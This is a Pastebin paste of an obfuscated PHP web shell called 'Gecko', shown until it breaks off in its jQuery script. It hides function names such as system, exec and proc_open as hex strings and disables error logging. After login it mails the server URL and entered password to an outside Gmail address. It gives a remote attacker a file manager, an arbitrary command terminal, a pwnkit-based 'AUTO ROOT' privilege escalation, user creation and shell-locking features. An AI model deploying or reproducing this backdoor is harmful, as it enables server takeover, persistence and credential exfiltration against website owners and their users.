Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <?php
- session_start();
- @set_time_limit(0);
- @clearstatcache();
- @ini_set('error_log', NULL);
- @ini_set('log_errors', 0);
- @ini_set('max_execution_time', 0);
- @ini_set('output_buffering', 0);
- @ini_set('display_errors', 0);
- /* Configuration */
- /* Password using md5 hashes */
- $password = "ff901c76f51ddf1f9f3212ee01192ce3"; //Syadlasvgass@@
- $default_action = "FilesMan";
- $default_use_ajax = true;
- $default_charset = 'UTF-8';
- date_default_timezone_set("Asia/Jakarta");
- function login_shell()
- {
- ?>
- <!DOCTYPE html>
- <html lang="en">
- <head>
- <meta charset="UTF-8">
- <meta http-equiv="X-UA-Compatible" content="IE=edge">
- <meta name="viewport" content="width=device-width, initial-scale=1.0">
- <style>
- body {
- font-family: monospace;
- }
- input[type="password"] {
- border: none;
- border-bottom: 1px solid black;
- padding: 2px;
- }
- input[type="password"]:focus {
- outline: none;
- }
- input[type="submit"] {
- border: none;
- padding: 4.5px 20px;
- background-color: #2e313d;
- color: #FFF;
- }
- </style>
- </head>
- <body>
- <form action="" method="post">
- <div align="center">
- <input type="password" name="pass" placeholder=" Password"> <input type="submit" name="submit" value=">">
- </div>
- </form>
- </body>
- </html>
- <?php
- exit;
- }
- if (!isset($_SESSION[md5($_SERVER['HTTP_HOST'])])) {
- if (isset($_POST['pass']) && (md5($_POST['pass']) == $password)) {
- $_SESSION[md5($_SERVER['HTTP_HOST'])] = true;
- $tmp = $_SERVER['SERVER_NAME'].$_SERVER['PHP_SELF']."
- ".$_POST['pass']; @mail('lilarsyad13@gmail.com', 'root', $tmp);
- } else {
- login_shell();
- }
- }
- ${"GLOBALS"}["wrrdfeiqpw"] = "info";
- ${"GLOBALS"}["snucwrjx"] = "perms";
- ${"GLOBALS"}["nlqvcexcsqf"] = "readDir";
- ${"GLOBALS"}["lbdylir"] = "openDir";
- ${"GLOBALS"}["sotsubd"] = "files";
- ${"GLOBALS"}["njgztpho"] = "dir";
- ${"GLOBALS"}["hoapkwhmi"] = "dirs";
- ${"GLOBALS"}["exvqbodeqcc"] = "exec";
- ${"GLOBALS"}["yqdkwiyd"] = "pipes";
- ${"GLOBALS"}["rwpikbcwrgi"] = "f";
- ${"GLOBALS"}["oplcdvp"] = "in";
- ${"GLOBALS"}["ylnznsnqbkvh"] = "re";
- ${"GLOBALS"}["ftlwdhcjjlb"] = "out";
- ${"GLOBALS"}["tcirhful"] = "dom";
- ${"GLOBALS"}["jbxzmvsqntn"] = "d0main";
- ${"GLOBALS"}["exkwiu"] = "count";
- ${"GLOBALS"}["myqqvzxfwnl"] = "d0mains";
- ${"GLOBALS"}["yxxjlgbcy"] = "pl";
- ${"GLOBALS"}["ivoqwpbeyh"] = "xpld";
- ${"GLOBALS"}["xvbovn"] = "xplod";
- ${"GLOBALS"}["qhksqaif"] = "n";
- ${"GLOBALS"}["xcntuxiflw"] = "y";
- ${"GLOBALS"}["tljbiml"] = "types";
- ${"GLOBALS"}["vrqmqvvo"] = "bytes";
- ${"GLOBALS"}["vhimbugtql"] = "flesName";
- ${"GLOBALS"}["ohmuswhkxx"] = "password";
- ${"GLOBALS"}["fqwhcuj"] = "username";
- ${"GLOBALS"}["ooftqvks"] = "chFiles";
- ${"GLOBALS"}["qhxnggsf"] = "renameFile";
- ${"GLOBALS"}["gpqxlxle"] = "rmfile";
- ${"GLOBALS"}["nfnomta"] = "rmdir";
- ${"GLOBALS"}["gsulzioh"] = "repl";
- ${"GLOBALS"}["hcoospnffxw"] = "it";
- ${"GLOBALS"}["wsmiqmj"] = "items";
- ${"GLOBALS"}["xpixzuvernku"] = "CurrentFile";
- ${"GLOBALS"}["yyxroabywchy"] = "htaccess";
- ${"GLOBALS"}["wiyrtp"] = "DOC_ROOT";
- ${"GLOBALS"}["tskfcwedkdet"] = "namaFilenya";
- ${"GLOBALS"}["vogxys"] = "handler";
- ${"GLOBALS"}["nfodbdej"] = "TmpNames";
- ${"GLOBALS"}["vfuhqrqrce"] = "curFile";
- ${"GLOBALS"}["iwwhffu"] = "response";
- ${"GLOBALS"}["ideydyre"] = "r_text";
- ${"GLOBALS"}["dgeabcp"] = "_F";
- ${"GLOBALS"}["cukzglotbx"] = "_D";
- ${"GLOBALS"}["lbxiapetcw"] = "pwd";
- ${"GLOBALS"}["ajlwquynyp"] = "id";
- ${"GLOBALS"}["wptxggqoj"] = "val";
- ${"GLOBALS"}["pjowplcj"] = "cwd";
- ${"GLOBALS"}["qyzlbuwcwh"] = "file_manager";
- ${"GLOBALS"}["nnodyjdebeu"] = "FilesDon";
- ${"GLOBALS"}["eujpqmf"] = "file";
- ${"GLOBALS"}["upursoy"] = "cdir";
- ${"GLOBALS"}["snxjpduol"] = "fungsi";
- ${"GLOBALS"}["ypqwtxfjbdmj"] = "hitung_array";
- ${"GLOBALS"}["xjbxgmpvoehr"] = "id";
- ${"GLOBALS"}["syglgogire"] = "i";
- $mipsckwblnip = "fungsi";
- ${"GLOBALS"}["gfxtft"] = "hitung_array";
- $jidhrueaj = "Array";
- $jleuhjkosfln = "fungsi";
- $lfcsjy = "Array";
- ${$lfcsjy} = ["676574637764", "676c6f62", "69735f646972", "69735f66696c65", "69735f7772697461626c65", "69735f7265616461626c65", "66696c657065726d73", "66696c65", "7068705f756e616d65", "6765745f63757272656e745f75736572", "68746d6c7370656369616c6368617273", "66696c655f6765745f636f6e74656e7473", "6d6b646972", "746f756368", "6368646972", "72656e616d65", "65786563", "7061737374687275", "73797374656d", "7368656c6c5f65786563", "706f70656e", "70636c6f7365", "73747265616d5f6765745f636f6e74656e7473", "70726f635f6f70656e", "756e6c696e6b", "726d646972", "666f70656e", "66636c6f7365", "66696c655f7075745f636f6e74656e7473", "6d6f76655f75706c6f616465645f66696c65", "63686d6f64", "7379735f6765745f74656d705f646972",];
- ${${"GLOBALS"}["gfxtft"]} = count(${$jidhrueaj});
- $xcywwvulehrr = "get_cwd";
- ${"GLOBALS"}["qrysdykadehk"] = "fungsi";
- ${"GLOBALS"}["igplhlwerlnp"] = "i";
- for (${${"GLOBALS"}["igplhlwerlnp"]} = 0; ${${"GLOBALS"}["syglgogire"]} < ${${"GLOBALS"}["ypqwtxfjbdmj"]}; ${${"GLOBALS"}["syglgogire"]}++) {
- $lowricyb = "Array";
- $sayjcbslb = "fungsi";
- ${$sayjcbslb}[] = unx(${$lowricyb}[${${"GLOBALS"}["syglgogire"]}]);
- }
- if (isset($_GET["d"])) {
- ${"GLOBALS"}["xxftgcpmi"] = "cdir";
- $yfpljk = "cdir";
- ${${"GLOBALS"}["xxftgcpmi"]} = unx($_GET["d"]);
- ${${"GLOBALS"}["snxjpduol"]}[14](${$yfpljk});
- } else {
- ${${"GLOBALS"}["upursoy"]} = ${${"GLOBALS"}["snxjpduol"]}[0]();
- }
- $iqxsvenssxc = "get_cwd";
- function download($file)
- {
- if (file_exists(${${"GLOBALS"}["eujpqmf"]})) {
- header("Content-Description: File Transfer");
- $qfkryzqde = "file";
- header("Content-Type: application/octet-stream");
- header("Content-Disposition: attachment; filename=" . basename(${${"GLOBALS"}["eujpqmf"]}));
- header("Content-Transfer-Encoding: binary");
- header("Expires: 0");
- header("Cache-Control: must-revalidate");
- header("Pragma: public");
- header("Content-Length: " . filesize(${$qfkryzqde}));
- ob_clean();
- flush();
- readfile(${${"GLOBALS"}["eujpqmf"]});
- exit;
- }
- }
- if ($_GET["don"] == true) {
- ${${"GLOBALS"}["nnodyjdebeu"]} = download(unx($_GET["don"]));
- }
- echo "
- <!DOCTYPE html>
- <html lang="en\">
- <head>
- <meta charset=\"UTF-8\">
- <meta http-equiv="X-UA-Compatible" content=\"IE=edge">
- <title>Gecko [ ";
- echo $_SERVER["SERVER_NAME"];
- echo " ]</title>
- <script src='https://kit.fontawesome.com/057b9b510c.js' crossorigin='anonymous'></script>
- <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.6.1/jquery.min.js\"></script>
- <style>
- body {
- background-color: #0e0f17;
- color: #FFF;
- font-family: monospace;
- }
- ul {
- list-style: none;
- }
- .menu-header li {
- padding: 5px 0;
- }
- .menu-header ul li {
- font-weight: bold;
- font-style: italic;
- }
- .btn-submit {
- padding: 7px 25px;
- text-decoration: none;
- border: 2px solid grey;
- border-radius: 4px;
- background-color: #22242d;
- color: #FFF;
- }
- .btn-submit:hover {
- border: 2px solid #c5c8d6;
- background-color: #2e313d;
- }
- .form-upload {
- margin: 10px 0;
- }
- .form-file {
- background-color: #22242d;
- border: 2px solid grey;
- padding: 5px 20px;
- color: #c5c8d6;
- border-radius: 4px;
- }
- .menu-tools li {
- display: inline-block;
- margin: 15px 0;
- }
- .menu-file-manager {
- margin: 10px 40px;
- }
- .menu-file-manager ul {
- background-color: #2e313d;
- }
- .menu-file-manager li {
- display: inline-block;
- margin: 15px 20px;
- }
- .menu-file-manager li a::after {
- content: \"";
- display: block;
- border-bottom: 1px solid #FFF;
- }
- .path-pwd {
- background-color: #2e313d;
- padding: 15px 0px;
- margin: 5px 0;
- }
- a {
- text-decoration: none;
- color: white;
- }
- a:hover {
- color: #c5c8d6;
- }
- table {
- border-radius: 5px;
- }
- thead {
- background-color: #2e313d;
- height: 35px;
- }
- tbody tr td {
- padding: 10px 0;
- }
- tbody tr td:nth-child(2),
- tbody tr td:nth-child(3),
- tbody tr td:nth-child(4) {
- text-align: center;
- }
- tbody tr:nth-child(even) {
- background-color: #22242d;
- }
- ::-webkit-scrollbar {
- width: 16px;
- }
- ::-webkit-scrollbar-track {
- background: #0e0f17;
- }
- ::-webkit-scrollbar-thumb {
- background: #22242d;
- border: 2px solid #555;
- border-radius: 4px;
- }
- ::-webkit-scrollbar-thumb:hover {
- background: #555;
- }
- .modal {
- display: none;
- z-index: 2;
- position: fixed;
- width: 100%;
- top: 0;
- left: 0;
- right: 0;
- bottom: 0;
- background-color: rgba(0, 0, 0, 0.3);
- }
- .modal-container {
- animation-name: modal-pop-out;
- animation-duration: 0.7s;
- animation-fill-mode: both;
- margin: auto;
- border-radius: 10px;
- margin-top: 10%;
- width: 800px;
- background-color: #f4f4f9;
- }
- @keyframes modal-pop-out {
- from {
- opacity: 0;
- }
- to {
- opacity: 1;
- }
- }
- .modal-header {
- color: black;
- margin-left: 30px;
- padding: 10px;
- }
- .modal-body {
- color: black;
- }
- .modal-create-input {
- width: 700px;
- padding: 10px 5px;
- background-color: #f4f4f9;
- margin: 0 5%;
- border: none;
- border-radius: 4px;
- box-shadow: 8px 8px 20px rgba(0, 0, 0, 0.2);
- border-bottom: 2px solid #0e0f17;
- }
- .box-shadow {
- box-shadow: 8px 8px 8px rgba(0, 0, 0, 0.2);
- }
- .btn-modal-close {
- background-color: #22242d;
- color: #FFF;
- border: none;
- border-radius: 4px;
- padding: 8px 35px;
- }
- .btn-modal-close:hover {
- background-color: #2e313d;
- }
- .modal-btn-form {
- margin: 15px 0;
- padding: 10px;
- text-align: right;
- }
- .file-size {
- color: orange;
- }
- .badge-root::after {
- content: "root";
- display: block;
- position: absolute;
- width: 40px;
- text-align: center;
- margin-top: -30px;
- margin-left: 110px;
- border-radius: 4px;
- background-color: red;
- }
- .badge-action-editor:hover::after {
- display: block;
- content: \"Rename";
- position: absolute;
- width: 60px;
- padding: 5px;
- border-radius: 5px;
- text-align: center;
- margin-top: -30px;
- margin-left: 110px;
- background-color: #2e313d;
- }
- .badge-action-chmod:hover::after {
- display: block;
- content: "Chmod";
- position: absolute;
- width: 60px;
- padding: 5px;
- border-radius: 5px;
- text-align: center;
- margin-top: -30px;
- margin-left: 110px;
- background-color: #2e313d;
- }
- .badge-action-download:hover::after {
- display: block;
- content: \"Download";
- position: absolute;
- width: 60px;
- padding: 5px;
- border-radius: 5px;
- text-align: center;
- margin-top: -30px;
- margin-left: 110px;
- background-color: #2e313d;
- }
- .code-editor {
- position: fixed;
- top: 0;
- bottom: 0;
- left: 0;
- right: 0;
- background-color: rgba(0, 0, 0, 0.3);
- width: 100%;
- }
- .code-editor-container {
- background-color: #f4f4f9;
- color: black;
- width: 95%;
- /* height: 80%; */
- margin: auto;
- border-radius: 10px;
- margin-top: 40px;
- }
- .code-editor-head {
- padding: 15px;
- font-weight: bold;
- }
- .code-editor-body textarea {
- width: 98.5%;
- font-size: smaller;
- border-radius: 4px;
- margin: 0px 4px;
- height: 400px;
- background-color: #22242d;
- resize: none;
- color: #FFF;
- }
- .terminal {
- position: fixed;
- top: 0;
- bottom: 0;
- left: 0;
- right: 0;
- background-color: rgba(0, 0, 0, 0.3);
- width: 100%;
- }
- .terminal-container {
- animation: modal-pop-out;
- animation-duration: 0.5s;
- animation-fill-mode: both;
- width: 90%;
- background-color: #f4f4f9;
- margin: auto;
- margin-top: 25px;
- color: black;
- border-radius: 4px;
- }
- .terminal-head {
- padding: 8px;
- }
- .terminal-head li a {
- color: black;
- position: absolute;
- right: 0;
- margin-right: 110px;
- font-weight: bold;
- margin-top: -20px;
- font-size: 25px;
- padding: 1px 10px;
- }
- .terminal-head li {
- display: inline-block;
- color: black;
- }
- .terminal-body textarea {
- width: 98.5%;
- margin: 4px;
- resize: none;
- background-color: #22242d;
- color: #29db12;
- border-radius: 4px;
- height: 400px;
- font-size: smaller;
- }
- .active {
- display: block;
- }
- .terminal-body li {
- display: inline-block;
- }
- .terminal-input {
- width: 500px;
- background-color: #22242d;
- color: white;
- padding: 6px;
- border: 1px solid #22242d;
- border-radius: 4px;
- margin: 5px 0;
- }
- </style>
- </head>
- <body>
- <div class="menu-header\">
- <ul>
- <li><i class="fa-solid fa-computer"></i> ";
- echo ${$jleuhjkosfln}[8]();
- ${"GLOBALS"}["ojrxlurnj"] = "file_manager";
- echo "</li>
- <li><i class="fa-solid fa-server\"></i> ";
- echo $_SERVER["SERVER_SOFTWARE"];
- echo "</li>
- <li><i class=\"fa-solid fa-network-wired"></i> : ";
- echo $_SERVER["SERVER_ADDR"];
- echo " | : ";
- ${"GLOBALS"}["hgrsptldxegl"] = "fungsi";
- echo $_SERVER["REMOTE_ADDR"];
- echo "</li>
- <li><i class="fa-solid fa-globe"></i> ";
- echo s();
- echo "</li>
- <li><i class="fa-solid fa-user"></i> ";
- echo ${$mipsckwblnip}[9]();
- ${"GLOBALS"}["cagmsfvd"] = "fungsi";
- echo "</li>
- <form action=\"\" method=\"post" enctype='";
- echo "multipart/form-data";
- echo "'>
- <li class="form-upload\"><input type="submit\" value="Upload\" name="gecko-up-submit" class=\"btn-submit"> <input type=\"file\" name=\"gecko-upload" class="form-file"></li>
- </form>
- </ul>
- </div>
- <div class="menu-tools\">
- <ul>
- <li><a href=\"?d=";
- echo hx(${${"GLOBALS"}["qrysdykadehk"]}[0]());
- echo "&terminal\" class=\"btn-submit\">Terminal</a></li>
- <li><a href="?d=";
- echo hx(${${"GLOBALS"}["snxjpduol"]}[0]());
- echo "&terminal=root\" class="btn-submit badge-root">AUTO ROOT</a></li>
- <li><a href=\"?d=";
- echo hx(${${"GLOBALS"}["snxjpduol"]}[0]());
- echo "&adminer" class=\"btn-submit">Adminer</a></li>
- <li><a href=\"?d=";
- echo hx(${${"GLOBALS"}["hgrsptldxegl"]}[0]());
- echo "&destroy\" class="btn-submit\">Backdoor Destroyer</a></li>
- <li><a href=\"https://www.exploit-db.com/search?q=Linux%20Kernel%20";
- $klpelcka = "pwd";
- ${"GLOBALS"}["sjuxivs"] = "fungsi";
- echo suggest_exploit();
- echo "\" class=\"btn-submit\">Linux Exploit</a></li>
- <li><a href=\"?d=";
- ${"GLOBALS"}["wwmyjswl"] = "cwd";
- ${"GLOBALS"}["znumtne"] = "pwd";
- echo hx(${${"GLOBALS"}["cagmsfvd"]}[0]());
- echo "&lockshell" class="btn-submit">Lock Shell</a></li>
- <li><a href=\"\" class="btn-submit\" id="lock-file\">Lock File</a></li>
- <li><a href=\"\" class=\"btn-submit badge-root" id=\"root-user\">Create User</a></li>
- <li><a href=\"https://github.com/MadExploits/\" class="btn-submit\">README</a></li>
- <li><a href=\"?d=";
- echo hx(${${"GLOBALS"}["snxjpduol"]}[0]());
- echo "&logout=True\" class=\"btn-submit\">LOGOUT!</a></li>
- </ul>
- </div>
- ";
- ${${"GLOBALS"}["qyzlbuwcwh"]} = ${${"GLOBALS"}["sjuxivs"]}[1]("{.[!.],}*", GLOB_BRACE);
- ${$iqxsvenssxc} = ${${"GLOBALS"}["snxjpduol"]}[0]();
- echo "
- <div class=\"menu-file-manager\">
- <ul>
- <li><a href="" id="create_folder">+ Create Folder</a></li>
- <li><a href="\" id="create_file">+ Create File</a></li>
- </ul>
- <div class=\"path-pwd">
- ";
- ${${"GLOBALS"}["pjowplcj"]} = str_replace("\", "/", ${$xcywwvulehrr});
- ${$klpelcka} = explode("/", ${${"GLOBALS"}["wwmyjswl"]});
- foreach (${${"GLOBALS"}["znumtne"]} as ${${"GLOBALS"}["xjbxgmpvoehr"]} => ${${"GLOBALS"}["wptxggqoj"]}) {
- ${"GLOBALS"}["gfmfqmoojp"] = "val";
- if (${${"GLOBALS"}["gfmfqmoojp"]} == "" && ${${"GLOBALS"}["ajlwquynyp"]} == 0) {
- echo " <a href=\"?d=" . hx("/") . "\"><i class=\"fa-solid fa-folder-plus\"></i> / </a>";
- continue;
- }
- ${"GLOBALS"}["omjbpweda"] = "i";
- if (${${"GLOBALS"}["wptxggqoj"]} == "") continue;
- echo "<a href="?d=";
- for (${${"GLOBALS"}["syglgogire"]} = 0; ${${"GLOBALS"}["syglgogire"]} <= ${${"GLOBALS"}["ajlwquynyp"]}; ${${"GLOBALS"}["omjbpweda"]}++) {
- $tfrndfywby = "id";
- $kbqjerlneivw = "i";
- echo hx(${${"GLOBALS"}["lbxiapetcw"]}[${$kbqjerlneivw}]);
- if (${${"GLOBALS"}["syglgogire"]} != ${$tfrndfywby}) echo hx("/");
- }
- echo "\">" . ${${"GLOBALS"}["wptxggqoj"]} . " / " . "</a>";
- }
- ${"GLOBALS"}["dhvaoy"] = "_D";
- echo "<a style='font-weight:bold; color:orange;' href='?d=" . hx(__DIR__) . "'>[ HOME SHELL ]</a>";
- echo " </div>
- </ul>
- <table style="width: 100%;">
- <thead>
- <tr>
- <th>Name</th>
- <th>Size</th>
- <th>Permission</th>
- <th>Action</th>
- </tr>
- </thead>
- <form action=\"\" method="post">
- <tbody>
- <!-- Gecko Folder File Manager -->
- ";
- foreach (${${"GLOBALS"}["ojrxlurnj"]} as ${${"GLOBALS"}["dhvaoy"]}) {
- $pywhhkgke = "fungsi";
- echo " ";
- if (${$pywhhkgke}[2](${${"GLOBALS"}["cukzglotbx"]})) {
- echo " <tr>
- <td><input type=\"checkbox" name=\"check[]" value=\"";
- echo ${${"GLOBALS"}["cukzglotbx"]};
- $ehsvypxf = "_D";
- echo "\"> <i class=\"fa-solid fa-folder-open\" style="color:orange;"></i> <a href=\"?d=";
- $puqomzystyu = "_D";
- echo hx(${${"GLOBALS"}["snxjpduol"]}[0]() . "/" . ${${"GLOBALS"}["cukzglotbx"]});
- echo "\">";
- echo ${$puqomzystyu};
- echo "</a></td>
- <td>[ DIR ]</td>
- <td>
- ";
- ${"GLOBALS"}["sixbple"] = "fungsi";
- $nlocfdtif = "_D";
- if (${${"GLOBALS"}["snxjpduol"]}[4](${${"GLOBALS"}["snxjpduol"]}[0]() . "/" . ${${"GLOBALS"}["cukzglotbx"]})) {
- echo "<font color="#00ff00\">";
- } elseif (!${${"GLOBALS"}["snxjpduol"]}[5](${${"GLOBALS"}["snxjpduol"]}[0]() . "/" . ${${"GLOBALS"}["cukzglotbx"]})) {
- echo "<font color="red\">";
- }
- echo perms(${${"GLOBALS"}["snxjpduol"]}[0]() . "/" . ${$nlocfdtif});
- echo " </td>
- <!-- Action Folder Manager -->
- <td><a href=\"?d=";
- echo hx(${${"GLOBALS"}["snxjpduol"]}[0]());
- echo "&re=";
- echo hx(${$ehsvypxf});
- echo "\" class="badge-action-editor"><i class=\"fa-solid fa-pen-to-square\"></i></a> <a href=\"?d=";
- echo hx(${${"GLOBALS"}["sixbple"]}[0]());
- echo "&ch=";
- echo hx(${${"GLOBALS"}["cukzglotbx"]});
- echo "\" class=\"badge-action-chmod\"><i class=\"fa-solid fa-user-pen"></i></a></td>
- </tr>
- ";
- }
- echo "
- ";
- }
- echo "
- <!-- Gecko Files Manager -->
- ";
- foreach (${${"GLOBALS"}["qyzlbuwcwh"]} as ${${"GLOBALS"}["dgeabcp"]}) {
- ${"GLOBALS"}["rsgrgcgkfv"] = "_F";
- ${"GLOBALS"}["mdtskzvpl"] = "fungsi";
- echo " ";
- if (${${"GLOBALS"}["mdtskzvpl"]}[3](${${"GLOBALS"}["rsgrgcgkfv"]})) {
- $bfubtphkoev = "_F";
- ${"GLOBALS"}["vyxoef"] = "fungsi";
- ${"GLOBALS"}["bkfssshyet"] = "_F";
- $xrgcmhekw = "_F";
- echo " <tr>
- <td><input type=\"checkbox\" name="check[]" value="";
- echo ${$bfubtphkoev};
- echo "\"> <i class="fa-solid fa-file-lines"></i> <a href=\"?d=";
- echo hx(${${"GLOBALS"}["snxjpduol"]}[0]());
- echo "&f=";
- ${"GLOBALS"}["lhlxrhq"] = "fungsi";
- echo hx(${$xrgcmhekw});
- echo "" class=\"gecko-files">";
- ${"GLOBALS"}["srmmmbgb"] = "fungsi";
- echo ${${"GLOBALS"}["dgeabcp"]};
- echo "</a></td>
- <td>";
- echo formatSize(filesize(${${"GLOBALS"}["dgeabcp"]}));
- ${"GLOBALS"}["tzcycish"] = "_F";
- echo "</td>
- <td>
- ";
- $dmbkcmjxgn = "fungsi";
- if (is_writable(${${"GLOBALS"}["vyxoef"]}[0]() . "/" . ${${"GLOBALS"}["cukzglotbx"]})) {
- echo "<font color="#00ff00">";
- } elseif (!is_readable(${${"GLOBALS"}["lhlxrhq"]}[0]() . "/" . ${${"GLOBALS"}["dgeabcp"]})) {
- echo "<font color=\"red\">";
- }
- echo perms(${${"GLOBALS"}["srmmmbgb"]}[0]() . "/" . ${${"GLOBALS"}["tzcycish"]});
- echo " </td>
- <!-- Action File Manager -->
- <td><a href=\"?d=";
- echo hx(${${"GLOBALS"}["snxjpduol"]}[0]());
- echo "&re=";
- echo hx(${${"GLOBALS"}["bkfssshyet"]});
- echo "" class="badge-action-editor\"><i class=\"fa-solid fa-pen-to-square\"></i></a> <a href=\"?d=";
- echo hx(${${"GLOBALS"}["snxjpduol"]}[0]());
- echo "&ch=";
- echo hx(${${"GLOBALS"}["dgeabcp"]});
- ${"GLOBALS"}["ennttlkad"] = "_F";
- echo "" class=\"badge-action-chmod\"><i class=\"fa-solid fa-user-pen"></i></a> <a href="?d=";
- echo hx(${$dmbkcmjxgn}[0]());
- echo "&don=";
- echo hx(${${"GLOBALS"}["ennttlkad"]});
- echo "\" class=\"badge-action-download\"><i class=\"fa-solid fa-download\"></i></a></td>
- </tr>
- ";
- }
- echo "
- ";
- }
- echo "
- </tbody>
- </table>
- <br>
- <select name="gecko-select\" class="btn-submit\">
- <option value=\"delete">Delete</option>
- <option value=\"unzip">Unzip</option>
- <option value="zip">Zip</option><br>
- </select>
- <input type="submit\" name="submit-action" value="Submit\" class="btn-submit\" style=\"padding: 8.3px 35px;\">
- </form>
- <!-- Modal Pop Jquery Create Folder/File By ./MrMad -->
- <div class=\"modal">
- <div class=\"modal-container\">
- <div class=\"modal-header">
- <h3><b><i id="modal-title\">\${this.title}</i></b></h3>
- </div>
- <div class="modal-body\">
- <form action="\" method=\"post">
- <span id=\"modal-input"></span>
- <div class=\"modal-btn-form\">
- <input type=\"submit\" name=\"submit" value=\"Submit\" class="btn-modal-close box-shadow\"> <button class=\"btn-modal-close box-shadow\" id="close-modal">Close</button>
- </div>
- </form>
- </div>
- </div>
- </div>
- </div>
- ";
- if ($_GET["f"]) {
- echo " <div class="code-editor\">
- <div class=\"code-editor-container">
- <div class=\"code-editor-head\">
- <h3><i class="fa-solid fa-code"></i> Code Editor : ";
- echo unx($_GET["f"]);
- echo "</h3>
- </div>
- <div class="code-editor-body\">
- <form action="\" method="post">
- <textarea name=\"code-editor" class=\"box-shadow" autofocus>";
- echo ${${"GLOBALS"}["snxjpduol"]}[10](${${"GLOBALS"}["snxjpduol"]}[11](${${"GLOBALS"}["snxjpduol"]}[0]() . "/" . unx($_GET["f"])));
- echo "</textarea>
- <div class=\"modal-btn-form">
- <input type=\"submit\" name="save-editor\" value=\"Save\" class=\"btn-modal-close"> <button class="btn-modal-close" id="close-editor">Close</button>
- </div>
- </form>
- </div>
- </div>
- </div>
- ";
- }
- echo "
- ";
- if (isset($_GET["terminal"])) {
- echo " <div class=\"terminal\">
- <div class=\"terminal-container">
- <div class=\"terminal-head\">
- <ul>
- <li id=\"terminal-title"><b><i class="fa-solid fa-terminal\"></i> TERMINAL</b></li>
- <li><a href=\"" class=\"close-terminal"><i class=\"fa-solid fa-right-from-bracket\"></i></a></li>
- </ul>
- </div>
- <div class="terminal-body">
- <textarea class=\"box-shadow" disabled>";
- if (isset($_POST["terminal"])) {
- echo ${${"GLOBALS"}["snxjpduol"]}[10](cmd($_POST["terminal-text"] . " 2>&1"));
- }
- echo "</textarea>
- <form action="" method=\"post\">
- <ul>
- <li><input type=\"text" name="terminal-text" class=\"terminal-input box-shadow" placeholder="";
- echo ${${"GLOBALS"}["snxjpduol"]}[9]() . "@" . $_SERVER["SERVER_ADDR"];
- echo "\" autofocus></li>
- <li><input type="submit\" name="terminal\" value=\">" class=\"btn-modal-close"></li>
- </ul>
- </form>
- </div>
- </div>
- </div>
- ";
- }
- echo "
- ";
- if ($_GET["terminal"] == "root") {
- $odogsyuij = "fungsi";
- echo " <div class=\"terminal\">
- <div class="terminal-container">
- <div class="terminal-head">
- <ul>
- <li id=\"terminal-title"><b><i class=\"fa-solid fa-terminal"></i> AUTO ROOT</b></li>
- <li><a href=\"\" class=\"close-terminal\"><i class="fa-solid fa-right-from-bracket"></i></a></li>
- </ul>
- </div>
- <div class="terminal-body\">
- <textarea name=\"" disabled>";
- if (${$odogsyuij}[3](".mad-root") && ${${"GLOBALS"}["snxjpduol"]}[3]("pwnkit")) {
- $ewmuqcvmm = "response";
- ${"GLOBALS"}["rimeshj"] = "fungsi";
- ${$ewmuqcvmm} = ${${"GLOBALS"}["rimeshj"]}[11](".mad-root");
- ${"GLOBALS"}["pnrucfmkpr"] = "r_text";
- ${${"GLOBALS"}["ideydyre"]} = explode(" ", ${${"GLOBALS"}["iwwhffu"]});
- if (${${"GLOBALS"}["pnrucfmkpr"]}[0] == "uid=0(root)") {
- if (isset($_POST["submit-root"])) {
- echo cmd("./pwnkit "" . $_POST["root-terminal"] . " 2>&1"");
- }
- } else {
- echo "This Device Is Not Vulnerable
- ";
- echo cmd("lsb_release -a") . "
- ";
- echo "Kernel Version : " . suggest_exploit() . "
- ";
- }
- } else {
- ${${"GLOBALS"}["snxjpduol"]}[24](".mad-root");
- }
- echo "</textarea>
- <form action=\"" method=\"post\">
- <ul>
- <li><input type=\"text\" name="root-terminal" class=\"terminal-input" placeholder=\"";
- echo "root" . "@" . $_SERVER["SERVER_ADDR"];
- echo "\" autofocus></li>
- <li><input type=\"submit\" name=\"submit-root\" value=">" class=\"btn-modal-close\"></li>
- </ul>
- </form>
- </div>
- </div>
- </div>
- ";
- }
- echo "
- ";
- if ($_GET["re"] == true) {
- echo " <div class=\"modal active">
- <div class=\"modal-container">
- <div class=\"modal-header">
- <h3><b><i id=\"modal-title">Rename : ";
- echo unx($_GET["re"]);
- echo "</i></b></h3>
- </div>
- <div class="modal-body">
- <form action=\"\" method="post\">
- <span id="modal-input"><input type="text\" name="renameFile\" class="modal-create-input\" placeholder="Rename\"></span>
- <div class="modal-btn-form">
- <input type="submit" name="submit\" value="Submit\" class=\"btn-modal-close box-shadow\"> <button class="btn-modal-close box-shadow close-btn-s\">Close</button>
- </div>
- </form>
- </div>
- </div>
- </div>
- </div>
- ";
- }
- echo "
- ";
- if ($_GET["ch"] == true) {
- echo " <div class="modal active\">
- <div class="modal-container">
- <div class="modal-header">
- <h3><b><i id="modal-title\">Change Permission : ";
- echo unx($_GET["ch"]);
- echo "</i></b></h3>
- </div>
- <div class="modal-body">
- <form action="" method="post">
- <span id=\"modal-input"><input type="number\" name="chFile" class=\"modal-create-input" placeholder="0775"></span>
- <div class="modal-btn-form\">
- <input type="submit\" name="submit" value="Submit" class="btn-modal-close box-shadow\"> <button class="btn-modal-close box-shadow close-btn-s">Close</button>
- </div>
- </form>
- </div>
- </div>
- </div>
- </div>
- ";
- }
- echo "
- <script>
- \$(document).ready(function() {
- \$('#create_folder').click(function() {
- \$('.modal').show();
- \$('#modal-title').html('<i class=\"fa-solid fa-folder-plus\"></i> Create Folder');
- \$('#modal-input').html('<input type=\"text\" name=\"create_folder" class="modal-create-input" placeholder=\"Create Folder">');
- event.preventDefault();
- });
- \$('#create_file').click(function() {
- \$('.modal').show();
- \$('#modal-title').html('<i class="fa-solid fa-file-circle-plus\"></i> Create File');
- \$('#modal-input').html('<input type="text\" name="create_file" class=\"modal-create-input\" placeholder="Create File">');
- event.preventDefault();
- });
- \$('#lock-file').click(function() {
- \$('.modal').show();
- \$('#modal-title').html('<i class=\"fa-solid fa-lock\"></i> Lock File');
- \$('#modal-input').html('<input type="text" name=\"lockfile" class=\"modal-create-input\" placeholder="Your File Name\">');
- event.preventDefault();
- });
- \$('#root-user').click(function() {
- \$('.modal').show();
- \$('#modal-title').html('<i class="fa-solid fa-user-plus"></i> ADD USER');
- \$('#modal-input').html('<input type="text" name="add-username\" class="modal-create-input" placeholder=\"Username\"><br><br><input type="text" name="add-password\" class=\"modal-create-input\" placeholder=\"Password\">');
- event.preventDefault();
- });
- \$('#close-modal').click(function() {
- \$('.modal').hide();
- event.preventDefault();
- });
